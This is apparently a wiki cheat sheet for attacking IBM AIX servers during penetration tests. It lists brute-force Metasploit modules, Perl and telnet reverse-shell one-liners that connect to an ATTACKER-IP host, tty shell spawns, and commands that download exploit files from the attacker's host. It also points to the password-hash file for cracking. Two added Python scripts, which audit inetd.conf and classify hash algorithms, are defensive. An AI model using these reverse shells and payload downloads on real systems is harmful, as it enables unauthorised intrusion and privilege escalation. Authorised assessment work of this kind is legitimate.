# General Assessment Tips
A few techniques involving default AIX packages/services that you may find useful at various stages of your assessment.
The attack vectors available to you will completely depend on the server’s configuration and running services. You MAY find some of the services listed below running on AIX servers.
| Port | Service | Attack Vector |
|---|---|---|
| 21 | FTP | Brute force. Metasploit module: `auxiliary/scanner/ftp/ftp_login` |
| 22 | SSH | Brute force. Metasploit module: `auxiliary/scanner/ssh/ssh_login` |
| 23 | Telnet | Brute force. Metasploit module: `auxiliary/scanner/telnet/telnet_login` |
| 512 | rexec | Brute force. Metasploit module: `auxiliary/scanner/rservices/rexec_login` |
| 513 | rlogin | Brute force. Metasploit module: `auxiliary/scanner/rservices/rlogin_login` |
| 80, 443 and countless others (this will vary depending on what additional software is installed on the server) | Web | Default passwords, brute force, shell uploads (WAR, JSP), etc. |
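From the defender's side, the cheapest way to know whether the legacy services in the table above are exposed is to read the host's `/etc/inetd.conf`, where AIX enables them. The following is an added example, not code from this wiki: it parses the inetd.conf line format (service name, socket type, protocol, wait/nowait, user, server program, arguments), skips commented-out entries, and reports which of the page's brute-forceable services are still switched on. The sample configuration embedded below is constructed for the example.

```python
"""Audit an AIX /etc/inetd.conf for the legacy services listed in the table above.

Added example, not part of the original wiki page. Each inetd.conf entry is
whitespace-separated: service socket-type protocol wait/nowait user server args.
A leading '#' disables the entry, which is how these services are usually turned
off on AIX.
"""
from typing import Dict, List

# Services from the table above, keyed by their inetd service name.
LEGACY_SERVICES: Dict[str, str] = {
    "ftp": "FTP (tcp/21): cleartext credentials, brute-forceable",
    "telnet": "Telnet (tcp/23): cleartext credentials, brute-forceable",
    "exec": "rexec (tcp/512): cleartext credentials, brute-forceable",
    "login": "rlogin (tcp/513): host-based trust, brute-forceable",
}

# Constructed sample; not taken from a real host. 'exec' is commented out.
SAMPLE_INETD_CONF = """\
## constructed sample inetd.conf
ftp     stream  tcp6    nowait  root    /usr/sbin/ftpd         ftpd
telnet  stream  tcp6    nowait  root    /usr/sbin/telnetd      telnetd -a
#exec   stream  tcp6    nowait  root    /usr/sbin/rexecd       rexecd
login   stream  tcp6    nowait  root    /usr/sbin/rlogind      rlogind
ssh     stream  tcp     nowait  root    /usr/sbin/sshd         sshd -i
"""


def enabled_services(inetd_conf: str) -> List[str]:
    """Return the service name of every uncommented, complete inetd.conf entry."""
    names: List[str] = []
    for raw in inetd_conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or disabled entry
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed entry; ignore rather than guess
        names.append(fields[0])
    return names


def legacy_findings(inetd_conf: str) -> Dict[str, str]:
    """Map each enabled legacy service to the reason it is worth disabling."""
    return {
        name: LEGACY_SERVICES[name]
        for name in enabled_services(inetd_conf)
        if name in LEGACY_SERVICES
    }


if __name__ == "__main__":
    for name, reason in legacy_findings(SAMPLE_INETD_CONF).items():
        print(f"{name:8s} enabled: {reason}")
```

Run it against a copy of the real file (`python3 audit.py < /etc/inetd.conf` after swapping the sample for `sys.stdin.read()`) to get a short list of entries to comment out and follow with `refresh -s inetd`.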
So you have command execution and want to level up and get a reverse shell? Set up a listener and try a few of the commands below.
| Software/Package | Command |
|---|---|
| Perl | `/usr/bin/perl -e 'use Socket;$i="ATTACKER-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'` |
| Telnet | `telnet ATTACKER-IP 80 \| /bin/sh \| LOCAL-IP 44445` |
| Telnet | `telnet ATTACKING-IP 80 \| /bin/sh \| telnet ATTACKING-IP 443` (Remember to listen on both port 80 and 443.) |
As is often the case, you may have found yourself in a restricted non-tty shell that limits your options when interacting with the server. Here are some tty shell spawns to try out.
| Software/Package | Command |
|---|---|
| /bin/sh | `/bin/sh -i` |
| Perl | `perl -e 'exec "/bin/sh";'` |
| Perl | `perl: exec "/bin/sh";` |
At some point during your post-exploitation, you’re probably going to want to download a file like a privilege escalation exploit onto the server. Some default programs installed on AIX that can aid you with file downloads are listed below (you're not likely to find wget, curl or nc installed, but you should still check if they are).
| Software/Package | Command |
|---|---|
| FTP | `ftp ATTACKER-IP` (input username and password) then `get FILE` |
| SCP | `scp ATTACKER-USER@ATTACKER-IP:/path/to/remote/FILE /path/to/local/FILE` |
| Telnet | `(echo 'GET /FILE'; echo ""; sleep 1; ) \| telnet ATTACKER-IP 80 > FILE` (NOTE: This command will also record some unnecessary telnet output at the top of the downloaded file, which could affect execution if it is a shell script. You can use `tail` to strip it: `tail -n +6 FILE > FILE2`) |
| Perl | `echo '#!/usr/bin/perl' > downloader.pl && echo 'use LWP::Simple; getstore("http://ATTACKER-IP:80/FILE", "FILE");' >> downloader.pl && perl downloader.pl` |
| Perl | `lwp-download http://ATTACKER-IP/FILE` (NOTE: `lwp-download` usually comes packaged with Perl.) |
Offensive Security’s Exploit Database has a number of privilege escalation exploits for various versions of AIX that you may find useful: https://www.exploit-db.com/
AIX's user password hashes are stored in the `/etc/security/passwd` file.
These hashes are not stored in the format used by other Unix systems. Hashcat does support the various hashing mechanisms used by AIX; you can find example hashes on its example-hashes page (search for AIX).
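Because `/etc/security/passwd` uses AIX's stanza layout rather than the colon-separated `/etc/shadow` format, an audit of which hash algorithm each account actually uses needs a small parser. The following is an added example, not from this wiki: it reads the stanza format (a `user:` line followed by indented `attribute = value` lines), classifies each `password` value by its algorithm tag (`{ssha512}`, `{ssha256}`, `{smd5}`; an untagged 13-character value is traditional DES `crypt(3)`), and lists accounts still on the weaker legacy algorithms so they can be rehashed by changing the system's `pwd_algorithm`. The sample file and every hash body in it are constructed placeholders, not real credentials.

```python
"""Classify password hash algorithms in an AIX /etc/security/passwd stanza file.

Added example, not from the original wiki page. Sample data below is
constructed; the hash bodies are placeholder strings, not real hashes.
"""
import re
from typing import Dict, Optional

# Constructed sample stanza file (placeholder hashes).
SAMPLE_SECURITY_PASSWD = """\
root:
        password = {ssha512}06$PLACEHOLDERSALT$PLACEHOLDERHASH
        lastupdate = 1700000000
        flags = ADMCHG

legacy:
        password = abPLACEHOLDER
        lastupdate = 1500000000

svc:
        password = {smd5}PLACEHOLDERSALT$PLACEHOLDERH
        lastupdate = 1600000000

locked:
        password = *
"""

STANZA_RE = re.compile(r"^(\S+):\s*$")          # "user:" opens a stanza
ATTR_RE = re.compile(r"^\s+(\w+)\s*=\s*(.*?)\s*$")  # indented "attr = value"

# Algorithms worth flagging: 13-char DES crypt and salted MD5 are the
# legacy choices; ssha256/ssha512 are the current ones.
WEAK_ALGORITHMS = {"des-crypt", "smd5"}


def parse_stanzas(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the stanza format into {user: {attribute: value}}."""
    users: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = STANZA_RE.match(line)
        if m:
            current = m.group(1)
            users[current] = {}
            continue
        m = ATTR_RE.match(line)
        if m and current is not None:
            users[current][m.group(1)] = m.group(2)
    return users


def hash_algorithm(value: str) -> str:
    """Name the algorithm a 'password' attribute value was produced with."""
    if value in ("", "*", "!"):
        return "none/locked"  # no usable hash: password login is not possible
    m = re.match(r"^\{(\w+)\}", value)
    if m:
        return m.group(1).lower()  # tagged: ssha512, ssha256, smd5, ...
    if len(value) == 13:
        return "des-crypt"  # untagged 13-char crypt(3), the legacy default
    return "unknown"


def weak_accounts(text: str) -> Dict[str, str]:
    """Users whose password hash uses a legacy algorithm, with the algorithm name."""
    findings: Dict[str, str] = {}
    for user, attrs in parse_stanzas(text).items():
        alg = hash_algorithm(attrs.get("password", ""))
        if alg in WEAK_ALGORITHMS:
            findings[user] = alg
    return findings


if __name__ == "__main__":
    for user, alg in weak_accounts(SAMPLE_SECURITY_PASSWD).items():
        print(f"{user}: {alg} (rehash on next password change)")
```

Reading the real file requires root; the script only needs the `password` attribute, so it can be run against a copy that has the hash bodies redacted as long as the `{tag}` prefix and the length of untagged values are preserved.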